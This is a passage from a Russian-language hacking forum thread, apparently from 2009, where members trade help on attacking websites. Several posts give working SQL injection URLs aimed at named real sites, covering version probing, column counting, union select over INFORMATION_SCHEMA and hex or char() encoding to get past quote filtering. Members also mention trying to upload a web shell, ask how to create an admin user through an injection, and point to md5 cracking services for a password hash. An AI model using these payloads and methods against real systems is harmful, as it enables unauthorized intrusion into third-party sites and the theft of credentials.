Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    что думаете?
     
  2. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    долго ломал голову что там)))
    после этого запроса все стало понятно :)
    Code:
    http://studorgs.bowdoin.edu/meddies/news.php?nid=10+and+substring(version(),1,1)=3/*
    3 ветка,поэтому вывода нет (union введён с четвётой версии mysql)

    p.s там вроде 8 полей) а не 18
    Code:
    http://studorgs.bowdoin.edu/meddies/news.php?nid=-10+order+by+8/*
     
    #5462 z00MAN, 18 Feb 2009
    Last edited: 18 Feb 2009
    1 person likes this.
  3. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    Помогите найти табличку с админами...
     
  4. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Думаю, что тебе поможет брутер+список названия таблиц...
     
    1 person likes this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Можно и так, но есть способ лучше :)

    Заходим в админку:
    http://www.travelwings.ru/admin/login.php
    Видим вверху надпись:
    Citrus CMS v2.0
    Гуглим и находим офф сайт этой цмс:
    http://citrus-soft.ru
    Видим. что она платная, значит с кодом обламываемся :) , но в портфолио присутствуют ещё сайты на этом движке, и существует вероятность найти пятую ветку и посмотреть структуру базы. Удачи
     
  6. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    jokester, я этим в первую очередь и занялся... болт там, все на 4ой!
     
  7. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    Да CMS платная, но у них инъекция в этой CMS. И самое, что интересное - на их сайте MySQL крутится из под рута. Пытался залить шелл, но видно пропалили... Сейчас инъекция просто на пустую страницу вываливает. И все портфолио которые сделаны на базе этой CMS - дырявые.
     
    2 people like this.
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вообще-то я об этом и писал, в портфолио тоже есть и пятая ветка , и рут, но видимо админы не дремлют(я полагаю туда народ ломанулся толпой ), т.к. сейчас у меня тоже запрос не проходит :)
     
    1 person likes this.
  9. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    есть иньекция после insert в поле регистрации, потом форма регистрации записывается в табличку с пользователями, можно ли достроить запрос, что бы зарегистрировать юзера с правами админа? что вообще можно с этой инъекцией сделать?
    зарание спасибо)
     
    #5469 pinky07, 18 Feb 2009
    Last edited: 18 Feb 2009
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    pinky07, http://www.cyberguru.ru/database/sql/sql-injections-page5.html
     
    1 person likes this.
  11. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Тепер вопрос . база mysql5 . но филтруеца ' .. при током запросе идёт филтер ....

    COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1+--



    ww~w.so-znanie.co~m/index.php?id=-2+union+select+1,2,3+--
    както обоити мозно?


    Помогите новичку . штоб не флюдить мозна и в ПМ
     
  12. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Ну тогда то что в кавычках пытаешься подать - захексируй.. в hex

    Вот атк

    PHP:
    <?php
    set_time_limit
    (0);
    $form = <<<FORM
    <form  method="post" action="">
    <textarea name="txt" rows="20" cols="100"></textarea>
    <input type="submit" name="ok">
    </form>
    FORM;
    if (
    $_POST['txt'] and $_POST['ok']){
    $my_url=$_POST['txt'];
    $strlength strlen($my_url);
        for(
    $i=0$i<$strlength$i++){
            
    $returnval .= dechex(ord(substr($my_url$i1)));
        }
    echo 
    '0x' $returnval;
    }else{
    echo 
    $form;
    }



    ?>
     
    #5472 попугай, 19 Feb 2009
    Last edited: 19 Feb 2009
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    2 попугай
    я нечего непонел из етого пхп кода .... я нерозбераюс в нём вопше . если нетрудно мош поподробние в пм скинут


    и есё вопросик . где мозно раскодироват парол от логина... просто узнал парол от аккаунта а он в кодирофке

    5870dc3ee770e65bb1a4a267f7c4fc6e
     
  14. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    Это md5
    расшифровать можно здесь: https://forum.antichat.ru/threadnav83865-1-10.html
    и здесь: https://hashcracking.info/
    и здесь: http://www.google.ru/search?hl=ru&q=md5+online+cracker
    или с помощью ПО, рекомендую PasswordsPro от InsidePro
     
  15. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Подробнее:

    Если хотим посмотреть колонки в таблице, но кавычки фильтруются, то таблицу кодируют.
    Кодируем в hex.

    Code:
    http://so-znanie.com/index.php?id=-2+union+select+1,2,column_name+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x61646d696e73+limit+0,1--
    Где, 0x61646d696e73 - таблица admins.

    Закодировать можно например на этом сайте - http://x3k.ru (SQL Hex)

    При переводе в hex - кавычки не использовать.
     
  16. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    можно еще через чар, получится так:

    Code:
    http://site.com/index.php?id=-2+union+select+1,2,column_name+from+information_schema.columns+profiling+where+table_name+LIKE+char(97,100,109,105,110,115)+limit+0,1--
    где char(97,100,109,105,110,115) = admins
     
    #5476 f1ng3r, 19 Feb 2009
    Last edited: 19 Feb 2009
  17. D1mka

    D1mka Elder - Старейшина

    Joined:
    2 Jan 2008
    Messages:
    123
    Likes Received:
    14
    Reputations:
    2
    когда вверху странички пишет:
    /includes/configure.php. Это - потенциальный риск безопасности - пожалуйста, установите необходимые права доступа к этому файлу.

    что то можна зделать?
     
  18. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    установить необходимые права и спать спокойно.
     
    1 person likes this.
  19. pingvit

    pingvit New Member

    Joined:
    10 Mar 2008
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Можно ли провернуть SQL injection при ошибке следующего вида:

    http://beatlesfestival.net.ua/requests.php?action=reset&requestid=sql'

    Читал faq'и, везде используют конструкции вида +union+select+кол-во_полей--
    А в данном случае, не пойму как это заюзать.
     
  20. groundhog

    groundhog Elder - Старейшина

    Joined:
    12 May 2007
    Messages:
    1,159
    Likes Received:
    425
    Reputations:
    180
    А с чего ты взял, что оно там есть и что оно не пофиксено?
     
Thread Status:
Not open for further replies.